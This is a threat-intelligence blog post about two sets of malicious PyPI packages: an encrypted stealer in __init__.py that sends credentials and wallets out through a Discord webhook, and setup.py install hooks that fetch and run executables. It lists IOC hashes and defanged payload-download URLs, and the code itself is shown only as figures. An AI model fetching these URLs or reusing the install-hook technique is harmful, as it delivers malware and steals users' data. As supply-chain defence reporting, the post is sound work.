X-Industry

PyPI Threats

Posted by CyberDog on August 16, 2023 at 12:00pm

12198576665?profile=RESIZE_400xPython Package Index (PyPI) packages have become a common way for threat actors to post malware that unsuspecting victims may download.  The FortiGuard Labs team has been monitoring this attack vector for some time and, earlier this year, began posting a monthly update of the zero-day attacks we have discovered.  Recently, FortiGuard introduced a new AI engine to our OSS supply chain attack hunting system.  Researchers have discovered several new zero-day PyPI attacks using this AI engine assistant.  A little preview of our AI engine detection is shown below.[1]

 

 

 

12198578263?profile=RESIZE_710x

Figure 1: AI engine detection

The FortiGuard report looks at two sets of zero-day attacks in PyPI packages published in early July.  They have bundled them together by the author to demonstrate how it is common for the same author to release several similar or even identical malicious packages using different PyPI account IDs.  For example, the packages in the first set were written by a threat actor who goes by the handle Josef M and uses the email address “johannes.mayer@yahoo.com.”  The second set was written by an author with the PyPI ID “killskids.”

The First Set of Packages

  • pycolouringsextV1 (version 1.1.0)
  • sysfontstoolV1 (version 1.1.0)
  • syscoloringsaddition (version 1.1.0)
  • pitutil (version 1.0.0)
  • syssqlitedbmodules (version 1.1.0)

These packages all had a similar project page style, as shown below:

12198578290?profile=RESIZE_710x

Figure 2: Project description of the first set of packages

 

Now look at one of the packages, “syssqlitedmodules.”  The first thing we notice in its __init__.py is a long string of encrypted code that will be run.
12198578485?profile=RESIZE_710x

Figure 3: __init__.py of syssqlitedmodules

After decryption, we can see this is a stealer malware, similar to the one we analyzed in a previous blog.  

 

Using a Discord webhook, it tries to steal information, such as credit cards, wallets, account logins, etc.

12198579272?profile=RESIZE_584x

Figure 4: Decrypted code snippet of __init__.py

The Second Set of Packages

  • killskids-auth (versions 1.0.5, 2.0.0)
  • testpackageforyoutube (version 1.0.0)

The setup.py in these packages tries to use cmdclass commands that may run when installing the package, as shown below.

12198579473?profile=RESIZE_400x

Figure 5: setup.py of one of the second set of packages


One can see that this setup.py tries to connect to a URL to download a potentially malicious executable file and run it. However, the payload for this package was unavailable at the time of our writing.

Conclusion:  This blog shows that the same author often uses different PyPI IDs when posting malicious packages.  This is likely an attempt to spread their malware as much as possible before it is taken down.  Using similar code for each package is a quick and easy way for malware authors to distribute malware quickly while increasing its shelf life.  

Discovering new OSS supply chain attacks hidden in millions of packages is like looking for a needle in a haystack.  Our new AI engine can detect these new attacks far better than traditional approaches, discovering threats in near real-time to protect organizations from malicious threat actors lying in wait.

IOCs:

pycolouringsextV1-1.1.0 __init__.py

            475e15da18cd785eb079981585a6519b

sysfontstoolV1-1.1.0 __init__.py

            475e15da18cd785eb079981585a6519b

syscoloringsaddition-1.1.0 __init__.py

            188a8e8f9afb0423276cbe92f8846c47

pitutil-1.0.0 __init__.py

            f658a9d876041b6434d073d883c72865

syssqlitedbmodules-1.1.0 __init__.py

            188a8e8f9afb0423276cbe92f8846c47

killskids-auth-1.0.5 setup.py

            d643d5f2e8631bcb831e3e79d198a061

killskids-auth-2.0.0 setup.py

            9286d9ad57a21c49a06dac2fb7f463ba

testpackageforyoutube-1.0.0 setup.py

            9c8cbdc00c745407198863372d5ca06c

Malicious URLs:

  • hxxps://github[.]com/killskids/test/raw/main/calc[.]exe
    hxxps://github[.]com/killskids/test/raw/main/auth-server[.]exe
    hxxps://file[.]io/IWbO1KYBw4Bn

 

This article is presented at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com

Weekly Cyber Intelligence Briefings:

Reporting: https://www.redskyalliance.org/
Website: https://www.redskyalliance.com/
LinkedIn: https://www.linkedin.com/company/64265941

Weekly Cyber Intelligence Briefings:

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/5993554863383553632  

 

[1] https://www.fortinet.com/blog/threat-research/continued-oss-supply-chain-attacks-hidden-in-pypi?lctg=141970831

Views: 159
Tags: ir-23-238-001, python package index (pypi), discord webhook, pypi ids
E-mail me when people leave their comments –
Follow

You need to be a member of Red Sky Alliance to add comments!